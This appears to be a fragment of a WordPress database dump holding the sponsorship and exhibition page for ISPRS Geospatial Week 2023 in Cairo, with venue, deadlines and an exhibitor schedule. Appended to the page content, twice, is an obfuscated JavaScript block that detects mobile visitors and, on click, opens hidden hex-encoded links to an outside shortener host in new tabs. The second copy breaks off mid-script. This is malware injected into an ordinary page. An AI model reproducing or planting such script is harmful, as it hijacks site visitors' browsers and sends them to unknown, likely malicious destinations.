href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1200x1200\" alignment=\"center\" image_hovers=\"false\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','publish','closed','closed','','sponsorship-and-exhibition','','','2023-03-23 03:51:58','2023-03-23 03:51:58','',0,'https://gsw2023.com/?page_id=2920',0,'page','',0),
(2921,1,'2023-09-16 22:41:12','2022-10-26 12:03:43','','Become a Sponsor','','publish','closed','closed','','2921','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/index.php/2022/10/26/2921/',28,'nav_menu_item','',0),
(2922,1,'2022-10-26 12:03:42','2022-10-26 12:03:42','','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:03:42','2022-10-26 12:03:42','',2920,'https://gsw2023.com/?p=2922',0,'revision','',0),
(2923,1,'2022-10-26 12:06:02','2022-10-26 12:06:02','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 